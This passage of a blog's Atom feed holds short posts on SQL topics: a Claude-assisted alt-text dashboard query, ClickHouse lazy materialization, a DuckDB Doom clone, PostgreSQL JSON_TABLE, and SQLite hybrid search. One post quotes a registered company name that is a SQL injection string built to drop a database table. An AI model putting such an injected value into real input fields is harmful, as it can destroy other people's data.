</summary><category term="geospatial"/><category term="sql"/><category term="duckdb"/><category term="drew-breunig"/></entry><entry><title>New dashboard: alt text for all my images</title><link href="https://simonwillison.net/2025/Apr/28/dashboard-alt-text/#atom-tag" rel="alternate"/><published>2025-04-28T01:22:27+00:00</published><updated>2025-04-28T01:22:27+00:00</updated><id>https://simonwillison.net/2025/Apr/28/dashboard-alt-text/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://simonwillison.net/dashboard/alt-text/"&gt;New dashboard: alt text for all my images&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
I got curious today about how I'd been using alt text for images on my blog, and realized that since I have &lt;a href="https://django-sql-dashboard.datasette.io/"&gt;Django SQL Dashboard&lt;/a&gt; running on this site and PostgreSQL is capable of &lt;a href="https://stackoverflow.com/questions/1732348/regex-match-open-tags-except-xhtml-self-contained-tags/1732454#1732454"&gt;parsing HTML with regular expressions&lt;/a&gt; I could probably find out using a SQL query.&lt;/p&gt;
&lt;p&gt;I pasted &lt;a href="https://simonwillison.net/dashboard/schema/"&gt;my PostgreSQL schema&lt;/a&gt; into Claude and gave it a pretty long prompt:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Give this PostgreSQL schema I want a query that returns all of my images and their alt text. Images are sometimes stored as HTML image tags and other times stored in markdown.&lt;/p&gt;
&lt;p&gt;&lt;code&gt;blog_quotation.quotation&lt;/code&gt;, &lt;code&gt;blog_note.body&lt;/code&gt; both contain markdown. &lt;code&gt;blog_blogmark.commentary&lt;/code&gt; has markdown if &lt;code&gt;use_markdown&lt;/code&gt; is true or HTML otherwise. &lt;code&gt;blog_entry.body&lt;/code&gt; is always HTML&lt;/p&gt;
&lt;p&gt;Write me a SQL query to extract all of my images and their alt tags using regular expressions. In HTML documents it should look for either &lt;code&gt;&amp;lt;img .* src="..." .* alt="..."&lt;/code&gt; or &lt;code&gt;&amp;lt;img alt="..." .* src="..."&lt;/code&gt; (images may be self-closing XHTML style in some places). In Markdown they will always be &lt;code&gt;![alt text](url)&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;I want the resulting table to have three columns: URL, alt_text, src - the URL column needs to be constructed as e.g. &lt;code&gt;/2025/Feb/2/slug&lt;/code&gt; for a record where created is on 2nd feb 2025 and the &lt;code&gt;slug&lt;/code&gt; column contains &lt;code&gt;slug&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Use CTEs and unions where appropriate&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;It almost got it right on the first go, and with &lt;a href="https://claude.ai/share/e3b996d3-b480-436d-aa40-9caa7609474f"&gt;a couple of follow-up prompts&lt;/a&gt; I had the query I wanted. I also added the option to &lt;a href="https://simonwillison.net/dashboard/alt-text/?search=pelican"&gt;search&lt;/a&gt; my alt text / image URLs, which has already helped me hunt down and fix a few old images on expired domain names. Here's a copy of &lt;a href="https://gist.github.com/simonw/5b44a662354e124e33cc1d4704cdb91a"&gt;the finished 100 line SQL query&lt;/a&gt;.


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/accessibility"&gt;accessibility&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/alt-text"&gt;alt-text&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/postgresql"&gt;postgresql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sql"&gt;sql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/django-sql-dashboard"&gt;django-sql-dashboard&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-assisted-programming"&gt;ai-assisted-programming&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/claude"&gt;claude&lt;/a&gt;&lt;/p&gt;



</summary><category term="accessibility"/><category term="alt-text"/><category term="postgresql"/><category term="sql"/><category term="ai"/><category term="django-sql-dashboard"/><category term="generative-ai"/><category term="llms"/><category term="ai-assisted-programming"/><category term="claude"/></entry><entry><title>ClickHouse gets lazier (and faster): Introducing lazy materialization</title><link href="https://simonwillison.net/2025/Apr/22/clickhouse-lazy-materializati/#atom-tag" rel="alternate"/><published>2025-04-22T17:05:33+00:00</published><updated>2025-04-22T17:05:33+00:00</updated><id>https://simonwillison.net/2025/Apr/22/clickhouse-lazy-materializati/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://clickhouse.com/blog/clickhouse-gets-lazier-and-faster-introducing-lazy-materialization"&gt;ClickHouse gets lazier (and faster): Introducing lazy materialization&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Tom Schreiber describe's the latest optimization in ClickHouse, and in the process explores a whole bunch of interesting characteristics of columnar datastores generally.&lt;/p&gt;
&lt;p&gt;As I understand it, the new "lazy materialization" feature means that if you run a query like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;select id, big_col1, big_col2
from big_table order by rand() limit 5
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Those &lt;code&gt;big_col1&lt;/code&gt; and &lt;code&gt;big_col2&lt;/code&gt; columns won't be read from disk for every record, just for the five that are returned. This can dramatically improve the performance of queries against huge tables - for one example query ClickHouse report a drop from "219 seconds to just 139 milliseconds—with 40× less data read and 300× lower memory usage."&lt;/p&gt;
&lt;p&gt;I'm linking to this mainly because the article itself is such a detailed discussion of columnar data patterns in general. It caused me to update my intuition for how queries against large tables can work on modern hardware. This query for example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT helpful_votes
FROM amazon.amazon_reviews
ORDER BY helpful_votes DESC
LIMIT 3;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Can run in 70ms against a 150 million row, 70GB table - because in a columnar database you only need to read that &lt;code&gt;helpful_votes&lt;/code&gt; integer column which adds up to just 600MB of data, and sorting 150 million integers on a decent machine takes no time at all.

    &lt;p&gt;&lt;small&gt;&lt;/small&gt;Via &lt;a href="https://news.ycombinator.com/item?id=43763688"&gt;Hacker News&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/databases"&gt;databases&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sql"&gt;sql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/clickhouse"&gt;clickhouse&lt;/a&gt;&lt;/p&gt;



</summary><category term="databases"/><category term="sql"/><category term="clickhouse"/></entry><entry><title>Abusing DuckDB-WASM by making SQL draw 3D graphics (Sort Of)</title><link href="https://simonwillison.net/2025/Apr/22/duckdb-wasm-doom/#atom-tag" rel="alternate"/><published>2025-04-22T16:29:13+00:00</published><updated>2025-04-22T16:29:13+00:00</updated><id>https://simonwillison.net/2025/Apr/22/duckdb-wasm-doom/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://www.hey.earth/posts/duckdb-doom"&gt;Abusing DuckDB-WASM by making SQL draw 3D graphics (Sort Of)&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Brilliant hack by Patrick Trainer who got an ASCII-art Doom clone running in the browser using convoluted SQL queries running against the WebAssembly build of DuckDB. Here’s the &lt;a href="https://patricktrainer.github.io/duckdb-doom/"&gt;live demo&lt;/a&gt;, and the &lt;a href="https://github.com/patricktrainer/duckdb-doom"&gt;code on GitHub&lt;/a&gt;.&lt;/p&gt;
&lt;div style="text-align: center; margin-bottom: 1em"&gt;
&lt;img alt="Animated demo GIF. Green ASCII art on black, with a map on the right and a Doom-style first person view on the left." src="https://static.simonwillison.net/static/2025/duckdb-wasm-doom.gif"&gt;
&lt;/div&gt;

&lt;p&gt;The SQL is &lt;a href="https://github.com/patricktrainer/duckdb-doom/blob/c36bcdab16bea40d916d3165f7bfdb437b86dde2/index.html#L140-L224"&gt;so much fun&lt;/a&gt;. Here’s a snippet that implements ray tracing as part of a SQL view:&lt;/p&gt;
&lt;pre&gt;&lt;span class="pl-k"&gt;CREATE OR REPLACE&lt;/span&gt; &lt;span class="pl-k"&gt;VIEW&lt;/span&gt; &lt;span class="pl-en"&gt;render_3d_frame&lt;/span&gt; &lt;span class="pl-k"&gt;AS&lt;/span&gt;
WITH RECURSIVE
    &lt;span class="pl-c"&gt;&lt;span class="pl-c"&gt;--&lt;/span&gt; ...&lt;/span&gt;
    rays &lt;span class="pl-k"&gt;AS&lt;/span&gt; (
        &lt;span class="pl-k"&gt;SELECT&lt;/span&gt; 
            &lt;span class="pl-c1"&gt;c&lt;/span&gt;.&lt;span class="pl-c1"&gt;col&lt;/span&gt;, 
            (&lt;span class="pl-c1"&gt;p&lt;/span&gt;.&lt;span class="pl-c1"&gt;dir&lt;/span&gt; &lt;span class="pl-k"&gt;-&lt;/span&gt; &lt;span class="pl-c1"&gt;s&lt;/span&gt;.&lt;span class="pl-c1"&gt;fov&lt;/span&gt;&lt;span class="pl-k"&gt;/&lt;/span&gt;&lt;span class="pl-c1"&gt;2&lt;/span&gt;.&lt;span class="pl-c1"&gt;0&lt;/span&gt; &lt;span class="pl-k"&gt;+&lt;/span&gt; &lt;span class="pl-c1"&gt;s&lt;/span&gt;.&lt;span class="pl-c1"&gt;fov&lt;/span&gt; &lt;span class="pl-k"&gt;*&lt;/span&gt; (&lt;span class="pl-c1"&gt;c&lt;/span&gt;.&lt;span class="pl-c1"&gt;col&lt;/span&gt;&lt;span class="pl-k"&gt;*&lt;/span&gt;&lt;span class="pl-c1"&gt;1&lt;/span&gt;.&lt;span class="pl-c1"&gt;0&lt;/span&gt; &lt;span class="pl-k"&gt;/&lt;/span&gt; (&lt;span class="pl-c1"&gt;s&lt;/span&gt;.&lt;span class="pl-c1"&gt;view_w&lt;/span&gt; &lt;span class="pl-k"&gt;-&lt;/span&gt; &lt;span class="pl-c1"&gt;1&lt;/span&gt;))) &lt;span class="pl-k"&gt;AS&lt;/span&gt; angle 
        &lt;span class="pl-k"&gt;FROM&lt;/span&gt; cols c, s, p
    ),
    raytrace(col, step_count, fx, fy, angle) &lt;span class="pl-k"&gt;AS&lt;/span&gt; (
        &lt;span class="pl-k"&gt;SELECT&lt;/span&gt; 
            &lt;span class="pl-c1"&gt;r&lt;/span&gt;.&lt;span class="pl-c1"&gt;col&lt;/span&gt;, 
            &lt;span class="pl-c1"&gt;1&lt;/span&gt;, 
            &lt;span class="pl-c1"&gt;p&lt;/span&gt;.&lt;span class="pl-c1"&gt;x&lt;/span&gt; &lt;span class="pl-k"&gt;+&lt;/span&gt; COS(&lt;span class="pl-c1"&gt;r&lt;/span&gt;.&lt;span class="pl-c1"&gt;angle&lt;/span&gt;)&lt;span class="pl-k"&gt;*&lt;/span&gt;&lt;span class="pl-c1"&gt;s&lt;/span&gt;.&lt;span class="pl-c1"&gt;step&lt;/span&gt;, 
            &lt;span class="pl-c1"&gt;p&lt;/span&gt;.&lt;span class="pl-c1"&gt;y&lt;/span&gt; &lt;span class="pl-k"&gt;+&lt;/span&gt; SIN(&lt;span class="pl-c1"&gt;r&lt;/span&gt;.&lt;span class="pl-c1"&gt;angle&lt;/span&gt;)&lt;span class="pl-k"&gt;*&lt;/span&gt;&lt;span class="pl-c1"&gt;s&lt;/span&gt;.&lt;span class="pl-c1"&gt;step&lt;/span&gt;, 
            &lt;span class="pl-c1"&gt;r&lt;/span&gt;.&lt;span class="pl-c1"&gt;angle&lt;/span&gt; 
        &lt;span class="pl-k"&gt;FROM&lt;/span&gt; rays r, p, s 
        &lt;span class="pl-k"&gt;UNION ALL&lt;/span&gt; 
        &lt;span class="pl-k"&gt;SELECT&lt;/span&gt; 
            &lt;span class="pl-c1"&gt;rt&lt;/span&gt;.&lt;span class="pl-c1"&gt;col&lt;/span&gt;, 
            &lt;span class="pl-c1"&gt;rt&lt;/span&gt;.&lt;span class="pl-c1"&gt;step_count&lt;/span&gt; &lt;span class="pl-k"&gt;+&lt;/span&gt; &lt;span class="pl-c1"&gt;1&lt;/span&gt;, 
            &lt;span class="pl-c1"&gt;rt&lt;/span&gt;.&lt;span class="pl-c1"&gt;fx&lt;/span&gt; &lt;span class="pl-k"&gt;+&lt;/span&gt; COS(&lt;span class="pl-c1"&gt;rt&lt;/span&gt;.&lt;span class="pl-c1"&gt;angle&lt;/span&gt;)&lt;span class="pl-k"&gt;*&lt;/span&gt;&lt;span class="pl-c1"&gt;s&lt;/span&gt;.&lt;span class="pl-c1"&gt;step&lt;/span&gt;, 
            &lt;span class="pl-c1"&gt;rt&lt;/span&gt;.&lt;span class="pl-c1"&gt;fy&lt;/span&gt; &lt;span class="pl-k"&gt;+&lt;/span&gt; SIN(&lt;span class="pl-c1"&gt;rt&lt;/span&gt;.&lt;span class="pl-c1"&gt;angle&lt;/span&gt;)&lt;span class="pl-k"&gt;*&lt;/span&gt;&lt;span class="pl-c1"&gt;s&lt;/span&gt;.&lt;span class="pl-c1"&gt;step&lt;/span&gt;, 
            &lt;span class="pl-c1"&gt;rt&lt;/span&gt;.&lt;span class="pl-c1"&gt;angle&lt;/span&gt; 
        &lt;span class="pl-k"&gt;FROM&lt;/span&gt; raytrace rt, s 
        &lt;span class="pl-k"&gt;WHERE&lt;/span&gt; &lt;span class="pl-c1"&gt;rt&lt;/span&gt;.&lt;span class="pl-c1"&gt;step_count&lt;/span&gt; &lt;span class="pl-k"&gt;&amp;lt;&lt;/span&gt; &lt;span class="pl-c1"&gt;s&lt;/span&gt;.&lt;span class="pl-c1"&gt;max_steps&lt;/span&gt; 
          &lt;span class="pl-k"&gt;AND&lt;/span&gt; NOT EXISTS (
              &lt;span class="pl-k"&gt;SELECT&lt;/span&gt; &lt;span class="pl-c1"&gt;1&lt;/span&gt; 
              &lt;span class="pl-k"&gt;FROM&lt;/span&gt; map m 
              &lt;span class="pl-k"&gt;WHERE&lt;/span&gt; &lt;span class="pl-c1"&gt;m&lt;/span&gt;.&lt;span class="pl-c1"&gt;x&lt;/span&gt; &lt;span class="pl-k"&gt;=&lt;/span&gt; CAST(&lt;span class="pl-c1"&gt;rt&lt;/span&gt;.&lt;span class="pl-c1"&gt;fx&lt;/span&gt; &lt;span class="pl-k"&gt;AS&lt;/span&gt; &lt;span class="pl-k"&gt;INT&lt;/span&gt;) 
                &lt;span class="pl-k"&gt;AND&lt;/span&gt; &lt;span class="pl-c1"&gt;m&lt;/span&gt;.&lt;span class="pl-c1"&gt;y&lt;/span&gt; &lt;span class="pl-k"&gt;=&lt;/span&gt; CAST(&lt;span class="pl-c1"&gt;rt&lt;/span&gt;.&lt;span class="pl-c1"&gt;fy&lt;/span&gt; &lt;span class="pl-k"&gt;AS&lt;/span&gt; &lt;span class="pl-k"&gt;INT&lt;/span&gt;) 
                &lt;span class="pl-k"&gt;AND&lt;/span&gt; &lt;span class="pl-c1"&gt;m&lt;/span&gt;.&lt;span class="pl-c1"&gt;tile&lt;/span&gt; &lt;span class="pl-k"&gt;=&lt;/span&gt; &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;'&lt;/span&gt;#&lt;span class="pl-pds"&gt;'&lt;/span&gt;&lt;/span&gt;
          )
    ),
    &lt;span class="pl-c"&gt;&lt;span class="pl-c"&gt;--&lt;/span&gt; ...&lt;/span&gt;&lt;/pre&gt;

    &lt;p&gt;&lt;small&gt;&lt;/small&gt;Via &lt;a href="https://news.ycombinator.com/item?id=43761998"&gt;Hacker News&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/sql"&gt;sql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/webassembly"&gt;webassembly&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/duckdb"&gt;duckdb&lt;/a&gt;&lt;/p&gt;



</summary><category term="sql"/><category term="webassembly"/><category term="duckdb"/></entry><entry><title>[NAME AVAILABLE ON REQUEST FROM COMPANIES HOUSE]</title><link href="https://simonwillison.net/2025/Apr/9/name-available-on-request/#atom-tag" rel="alternate"/><published>2025-04-09T16:52:04+00:00</published><updated>2025-04-09T16:52:04+00:00</updated><id>https://simonwillison.net/2025/Apr/9/name-available-on-request/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://find-and-update.company-information.service.gov.uk/company/10542519"&gt;[NAME AVAILABLE ON REQUEST FROM COMPANIES HOUSE]&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
I just noticed that the legendary company name &lt;code&gt;; DROP TABLE "COMPANIES";-- LTD&lt;/code&gt; is now listed as &lt;code&gt;[NAME AVAILABLE ON REQUEST FROM COMPANIES HOUSE]&lt;/code&gt; on the UK government Companies House website.&lt;/p&gt;
&lt;p&gt;For background, see &lt;a href="https://pizzey.me/posts/no-i-didnt-try-to-break-companies-house/"&gt;No, I didn't try to break Companies House&lt;/a&gt; by culprit Sam Pizzey.


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/sql"&gt;sql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sql-injection"&gt;sql-injection&lt;/a&gt;&lt;/p&gt;



</summary><category term="sql"/><category term="sql-injection"/></entry><entry><title>I Went To SQL Injection Court</title><link href="https://simonwillison.net/2025/Feb/25/i-went-to-sql-injection-court/#atom-tag" rel="alternate"/><published>2025-02-25T22:45:57+00:00</published><updated>2025-02-25T22:45:57+00:00</updated><id>https://simonwillison.net/2025/Feb/25/i-went-to-sql-injection-court/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://sockpuppet.org/blog/2025/02/09/fixing-illinois-foia/"&gt;I Went To SQL Injection Court&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Thomas Ptacek talks about his ongoing involvement as an expert witness in an Illinois legal battle lead by Matt Chapman over whether a SQL schema (e.g. for the CANVAS parking ticket database) should be accessible to Freedom of Information (FOIA) requests against the Illinois state government.&lt;/p&gt;
&lt;p&gt;They eventually lost in the Illinois Supreme Court, but there's still hope in the shape of &lt;a href="https://legiscan.com/IL/bill/SB0226/2025"&gt;IL SB0226&lt;/a&gt;, a proposed bill that would amend the FOIA act to ensure "that the public body shall provide a sufficient description of the structures of all databases under the control of the public body to allow a requester to request the public body to perform specific database queries".&lt;/p&gt;
&lt;p&gt;Thomas &lt;a href="https://news.ycombinator.com/item?id=43175628#43175758"&gt;posted this comment&lt;/a&gt; on Hacker News:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Permit me a PSA about local politics: engaging in national politics is bleak and dispiriting, like being a gnat bouncing off the glass plate window of a skyscraper. Local politics is, by contrast, extremely responsive. I've gotten things done --- including a law passed --- in my spare time and at practically no expense (&lt;em&gt;drastically&lt;/em&gt; unlike national politics).&lt;/p&gt;
&lt;/blockquote&gt;

    &lt;p&gt;&lt;small&gt;&lt;/small&gt;Via &lt;a href="https://news.ycombinator.com/item?id=43175628"&gt;Hacker News&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/data-journalism"&gt;data-journalism&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/databases"&gt;databases&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/government"&gt;government&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/law"&gt;law&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/politics"&gt;politics&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sql"&gt;sql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sql-injection"&gt;sql-injection&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/thomas-ptacek"&gt;thomas-ptacek&lt;/a&gt;&lt;/p&gt;



</summary><category term="data-journalism"/><category term="databases"/><category term="government"/><category term="law"/><category term="politics"/><category term="sql"/><category term="sql-injection"/><category term="thomas-ptacek"/></entry><entry><title>Dashboard: Tools</title><link href="https://simonwillison.net/2024/Oct/21/dashboard-tools/#atom-tag" rel="alternate"/><published>2024-10-21T03:33:41+00:00</published><updated>2024-10-21T03:33:41+00:00</updated><id>https://simonwillison.net/2024/Oct/21/dashboard-tools/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://simonwillison.net/dashboard/tools/"&gt;Dashboard: Tools&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
I used &lt;a href="https://django-sql-dashboard.datasette.io/"&gt;Django SQL Dashboard&lt;/a&gt; to spin up a dashboard that shows all of the URLs to my &lt;a href="https://tools.simonwillison.net/"&gt;tools.simonwillison.net&lt;/a&gt; site that I've shared on my blog so far. It uses this (Claude assisted) regular expression in a PostgreSQL SQL query:&lt;/p&gt;
&lt;div class="highlight highlight-source-sql"&gt;&lt;pre&gt;&lt;span class="pl-k"&gt;select distinct&lt;/span&gt; &lt;span class="pl-k"&gt;on&lt;/span&gt; (tool_url)
    unnest(regexp_matches(
        body,
        &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;'&lt;/span&gt;(https://tools&lt;span class="pl-cce"&gt;\.&lt;/span&gt;simonwillison&lt;span class="pl-cce"&gt;\.&lt;/span&gt;net/[^&amp;lt;"&lt;span class="pl-cce"&gt;\s&lt;/span&gt;)]+)&lt;span class="pl-pds"&gt;'&lt;/span&gt;&lt;/span&gt;,
        &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;'&lt;/span&gt;g&lt;span class="pl-pds"&gt;'&lt;/span&gt;&lt;/span&gt;
    )) &lt;span class="pl-k"&gt;as&lt;/span&gt; tool_url,
    &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;'&lt;/span&gt;https://simonwillison.net/&lt;span class="pl-pds"&gt;'&lt;/span&gt;&lt;/span&gt; &lt;span class="pl-k"&gt;||&lt;/span&gt; left(type, &lt;span class="pl-c1"&gt;1&lt;/span&gt;) &lt;span class="pl-k"&gt;||&lt;/span&gt; &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;'&lt;/span&gt;/&lt;span class="pl-pds"&gt;'&lt;/span&gt;&lt;/span&gt; &lt;span class="pl-k"&gt;||&lt;/span&gt; id &lt;span class="pl-k"&gt;as&lt;/span&gt; blog_url,
    title,
    &lt;span class="pl-k"&gt;date&lt;/span&gt;(created) &lt;span class="pl-k"&gt;as&lt;/span&gt; created
&lt;span class="pl-k"&gt;from&lt;/span&gt; content&lt;/pre&gt;&lt;/div&gt;

&lt;p&gt;I've been really enjoying having a static hosting platform (it's GitHub Pages serving my &lt;a href="https://github.com/simonw/tools"&gt;simonw/tools&lt;/a&gt; repo) that I can use to quickly deploy little HTML+JavaScript interactive tools and demos.


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/javascript"&gt;javascript&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/postgresql"&gt;postgresql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/projects"&gt;projects&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sql"&gt;sql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/tools"&gt;tools&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/django-sql-dashboard"&gt;django-sql-dashboard&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-assisted-programming"&gt;ai-assisted-programming&lt;/a&gt;&lt;/p&gt;



</summary><category term="javascript"/><category term="postgresql"/><category term="projects"/><category term="sql"/><category term="tools"/><category term="django-sql-dashboard"/><category term="ai-assisted-programming"/></entry><entry><title>PostgreSQL 17: SQL/JSON is here!</title><link href="https://simonwillison.net/2024/Oct/13/postgresql-sqljson/#atom-tag" rel="alternate"/><published>2024-10-13T19:01:02+00:00</published><updated>2024-10-13T19:01:02+00:00</updated><id>https://simonwillison.net/2024/Oct/13/postgresql-sqljson/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://www.depesz.com/2024/10/11/sql-json-is-here-kinda-waiting-for-pg-17/"&gt;PostgreSQL 17: SQL/JSON is here!&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Hubert Lubaczewski dives into the new JSON features added in PostgreSQL 17, released a few weeks ago on the &lt;a href="https://www.postgresql.org/about/news/postgresql-17-released-2936/"&gt;26th of September&lt;/a&gt;. This is the latest in his &lt;a href="https://www.depesz.com/tag/waiting/"&gt;long series&lt;/a&gt; of similar posts about new PostgreSQL features.&lt;/p&gt;
&lt;p&gt;The features are based on the new &lt;a href="https://en.wikipedia.org/wiki/SQL:2023"&gt;SQL:2023&lt;/a&gt; standard from June 2023. If you want to actually &lt;em&gt;read&lt;/em&gt; the specification for SQL:2023 it looks like you have to &lt;a href="https://www.iso.org/standard/76583.html"&gt;buy a PDF from ISO&lt;/a&gt; for 194 Swiss Francs (currently $226). Here's a handy summary by Peter Eisentraut: &lt;a href="http://peter.eisentraut.org/blog/2023/04/04/sql-2023-is-finished-here-is-whats-new"&gt;SQL:2023 is finished: Here is what's new&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;There's a lot of neat stuff in here. I'm particularly interested in the &lt;code&gt;json_table()&lt;/code&gt; table-valued function, which can convert a JSON string into a table with quite a lot of flexibility. You can even specify a full table schema as part of the function call:&lt;/p&gt;
&lt;div class="highlight highlight-source-sql"&gt;&lt;pre&gt;&lt;span class="pl-k"&gt;SELECT&lt;/span&gt; &lt;span class="pl-k"&gt;*&lt;/span&gt; &lt;span class="pl-k"&gt;FROM&lt;/span&gt; json_table(
    &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;'&lt;/span&gt;[{"a":10,"b":20},{"a":30,"b":40}]&lt;span class="pl-pds"&gt;'&lt;/span&gt;&lt;/span&gt;::jsonb,
    &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;'&lt;/span&gt;$[*]&lt;span class="pl-pds"&gt;'&lt;/span&gt;&lt;/span&gt;
    COLUMNS (
        id FOR ORDINALITY,
        column_a int4 &lt;span class="pl-k"&gt;path&lt;/span&gt; &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;'&lt;/span&gt;$.a&lt;span class="pl-pds"&gt;'&lt;/span&gt;&lt;/span&gt;,
        column_b int4 &lt;span class="pl-k"&gt;path&lt;/span&gt; &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;'&lt;/span&gt;$.b&lt;span class="pl-pds"&gt;'&lt;/span&gt;&lt;/span&gt;,
        a int4,
        b int4,
        c &lt;span class="pl-k"&gt;text&lt;/span&gt;
    )
);&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;SQLite has &lt;a href="https://www.sqlite.org/json1.html"&gt;solid JSON support already&lt;/a&gt; and often imitates PostgreSQL features, so I wonder if we'll see an update to SQLite that reflects some aspects of this new syntax.

    &lt;p&gt;&lt;small&gt;&lt;/small&gt;Via &lt;a href="https://lobste.rs/s/spw1je/sql_json_is_here_kinda_waiting_for_pg_17"&gt;lobste.rs&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/json"&gt;json&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/postgresql"&gt;postgresql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sql"&gt;sql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sqlite"&gt;sqlite&lt;/a&gt;&lt;/p&gt;



</summary><category term="json"/><category term="postgresql"/><category term="sql"/><category term="sqlite"/></entry><entry><title>Hybrid full-text search and vector search with SQLite</title><link href="https://simonwillison.net/2024/Oct/4/hybrid-full-text-search-and-vector-search-with-sqlite/#atom-tag" rel="alternate"/><published>2024-10-04T16:22:09+00:00</published><updated>2024-10-04T16:22:09+00:00</updated><id>https://simonwillison.net/2024/Oct/4/hybrid-full-text-search-and-vector-search-with-sqlite/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://alexgarcia.xyz/blog/2024/sqlite-vec-hybrid-search/index.html"&gt;Hybrid full-text search and vector search with SQLite&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
As part of Alex’s work on his &lt;a href="https://github.com/asg017/sqlite-vec"&gt;sqlite-vec&lt;/a&gt; SQLite extension - adding fast vector lookups to SQLite - he’s been investigating hybrid search, where search results from both vector similarity and traditional full-text search are combined together.&lt;/p&gt;
&lt;p&gt;The most promising approach looks to be &lt;a href="https://learn.microsoft.com/en-us/azure/search/hybrid-search-ranking"&gt;Reciprocal Rank Fusion&lt;/a&gt;, which combines the top ranked items from both approaches. Here’s Alex’s SQL query:&lt;/p&gt;
&lt;div class="highlight highlight-source-sql"&gt;&lt;pre&gt;&lt;span class="pl-c"&gt;&lt;span class="pl-c"&gt;--&lt;/span&gt; the sqlite-vec KNN vector search results&lt;/span&gt;
with vec_matches &lt;span class="pl-k"&gt;as&lt;/span&gt; (
  &lt;span class="pl-k"&gt;select&lt;/span&gt;
    article_id,
    row_number() over (&lt;span class="pl-k"&gt;order by&lt;/span&gt; distance) &lt;span class="pl-k"&gt;as&lt;/span&gt; rank_number,
    distance
  &lt;span class="pl-k"&gt;from&lt;/span&gt; vec_articles
  &lt;span class="pl-k"&gt;where&lt;/span&gt;
    headline_embedding match lembed(:query)
    &lt;span class="pl-k"&gt;and&lt;/span&gt; k &lt;span class="pl-k"&gt;=&lt;/span&gt; :k
),
&lt;span class="pl-c"&gt;&lt;span class="pl-c"&gt;--&lt;/span&gt; the FTS5 search results&lt;/span&gt;
fts_matches &lt;span class="pl-k"&gt;as&lt;/span&gt; (
  &lt;span class="pl-k"&gt;select&lt;/span&gt;
    rowid,
